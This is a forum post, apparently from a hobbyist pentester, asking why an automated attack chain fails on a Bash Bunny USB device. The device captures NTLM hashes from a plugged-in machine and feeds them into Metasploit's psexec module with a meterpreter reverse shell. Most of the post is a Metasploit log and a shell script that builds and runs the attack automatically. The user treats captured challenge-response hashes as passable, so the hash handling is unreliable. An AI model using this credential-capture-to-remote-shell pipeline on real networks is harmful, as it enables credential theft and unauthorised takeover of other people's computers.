Maestropastelero Posted October 23, 2017 Share Posted October 23, 2017 This is not a 100% BashBunny topic, but it is related and I think all the newbies like me could be interested. I 've used Metasploit in a Kali laptop with a post mimikatz module loaded and dump NTLMv2 hashes fine. Takes a Superuser account hash, and use exploit/windows/smb/psexec for accessing other computers on the same network. Then I realize I can setup msf on my BB. Running V1.3 on my BB, I setup Metasploit following this guide : https://steemit.com/technology/@cronetos/install-metasploit-framework-on-the-bash-bunny-or-other-debian-related-distros First, it melt my brain as it didn't work and I am not super skilled on this matters, but after some Gems uninstall/install/downgrade I finally make it works. Then I used the quickcreds payload for getting the hashes through the USB and when that is done, I build a RC file that it pass to the msfconsole -r. So far so good. Metasploit takes like 1 minute to load, but it works. The problem is when it try to exploit it, I always get Login Error : execution expired The main question is: are the hashes on hashdump somehow different than the hashes that quickcreds provides? (I hope that don't sounds too newbie) Or anyone see anything bad on what I am doing here? This is the log I got from metasploit : =[ metasploit v4.15.7-dev-70a82b5 ] + -- --=[ 1674 exploits - 960 auxiliary - 295 post ] + -- --=[ 489 payloads - 40 encoders - 9 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] [*] Processing /root/udisk/loot/quickcreds/LAPTOP1/conf.txt for ERB directives. resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> use exploit/windows/smb/psexec resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set LHOST 172.16.64.1 LHOST => 172.16.64.1 resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set LPORT 443 LPORT => 443 resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set RHOST 172.16.64.10 RHOST => 172.16.64.10 resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBUser myusername SMBUser => myusername resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBPass df201f7e84ef06aa:7C3A900BB41C05C66F3BE717CF1F8FCB SMBPass => df201f7e84ef06aa:7C3A900BB41C05C66F3BE717CF1F8FCB resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBDomain OFFICEDOMAIN SMBDomain => OFFICEDOMAIN resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> exploit -j [*] Exploit running as background job. resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> sleep 20 [*] Started reverse TCP handler on 172.16.64.1:443 [*] 172.16.64.10:445 - Connecting to the server... [*] 172.16.64.10:445 - Authenticating to 172.16.64.10:445|OFFICEDOMAIN as user 'myusername'...[-] 172.16.64.10:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: execution expired --------------------------------------------------------------------------------------------------- This is what I added to the payload to test it (ugly code, it is just a test): echo "use exploit/windows/smb/psexec" > $LOOTDIR/$HOST-$COUNT/conf.txt echo "set payload windows/meterpreter/reverse_tcp" >> $LOOTDIR/$HOST-$COUNT/conf.txt echo "set LHOST 172.16.64.1" >> $LOOTDIR/$HOST-$COUNT/conf.txt echo "set LPORT 443" >> $LOOTDIR/$HOST-$COUNT/conf.txt echo "set RHOST ${TARGET_IP}" >> $LOOTDIR/$HOST-$COUNT/conf.txt head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBUser "$1}' >> $LOOTDIR/$HOST-$COUNT/conf.txt head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBPass "$4":"$5}' >> $LOOTDIR/$HOST-$COUNT/conf.txt head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBDomain "$3}' >> $LOOTDIR/$HOST-$COUNT/conf.txt echo "exploit -j" >> $LOOTDIR/$HOST-$COUNT/conf.txt export HOME=/root source /etc/profile.d/rvm.sh cd /root/metasploit-framework/ ./msfconsole -r $LOOTDIR/$HOST-$COUNT/conf.txt &>> /root/msf.log Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.